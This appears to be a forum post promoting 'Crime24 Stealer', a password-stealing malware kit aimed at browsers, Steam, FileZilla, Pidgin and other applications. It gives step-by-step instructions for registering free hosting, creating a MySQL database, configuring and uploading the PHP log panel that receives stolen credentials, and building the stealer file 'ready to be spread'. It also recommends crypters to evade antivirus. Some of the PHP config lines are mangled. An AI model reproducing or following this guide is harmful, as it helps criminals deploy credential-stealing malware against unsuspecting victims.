RHZ 1 comment

Password Stealer

• Netframe work 3.0 or better
• normal or free hosting website

• WebPanel
• Check PHP
• Check FTP
• Melt

• Internet Explorer
• Google Chrome
• Mozilla Firefox 9/10
• JDownloader
• Steam User
• Minecraft (FTP only)
• FileZilla
• Pidgin
• Opera

How to Setup Crime24 Stealer:

Step # 1:
Register to any free hosting web ,like this http://www.freehosting.com/register.jsp to obtain an FTP and a MySQL database for free.

Step # 2:
Once your registration is complete, go to your panel: "UserCP".
Click "Create / delete MySQL database".

Name the base as you like, it will include your user name (username).
In this example my username will be "uzair".
And my MySQL database will be named "uzair_db."
Click on "Create Database".

Now for the user (user), mine is called "
Choose a password of your choice, for me it will be "passw0rd"
Click on "Create User".

To assign privileges, verify that the user and the MySQL database are carefully selected in the list.
When all the boxes are checked, click "give it all priviledges."

Step # 3:
Open Crime24 StealerPHP Loggerindex.php and edit the "Configuration".
I'll show you my setup following my example:

$ Dbhost = "localhost" / / MySQL host => Let it be
$ DbUser = "exemple_user" / / MySQL username => Your username database
$ Dbpass = "passw0rd" / / MySQL password => Your password database
$ DbDatabase = "exemple_db" / / MySQL database name => The name of your database

$ Username = "Your-log" / / Login Username => Your login to connect to the panel logs
$ Password = "Your Pass" / / Login Password => Password to connect to the panel logs

$ Logspage = 50 / / Number of logs per page => Number of logs per page, leave it as

We can say that this is the hardest part. Good but be logical, especially since I have commented so you do not deceive you.

Step # 4:
Return on freeHost or webpanel ,  click "File Manager" in the "User CP" and upload index.php & style.css
After that, Crime24 Stealer is created! You can view your logs at the following address: http://www.yourusername.freehost.com/index.php
Replace "yourusername" with the username of your account freeHost.
To connect to the panel logs, enter the "login & password" that you marked in the configuration.

Step # 5:
Open Crime24 Stealer and fill the necessary information.
The URL is: http://yourusername.freehost.com/index.php replacing "yourusername" with the username of your account freeHost.
Click Build, and it is your file is ready to be spread!
YOUR Rat is ready ,mostly 50% avtivirus can detected ,if u wanna make Full undectable rat so u can use Private "FuD Crypters"


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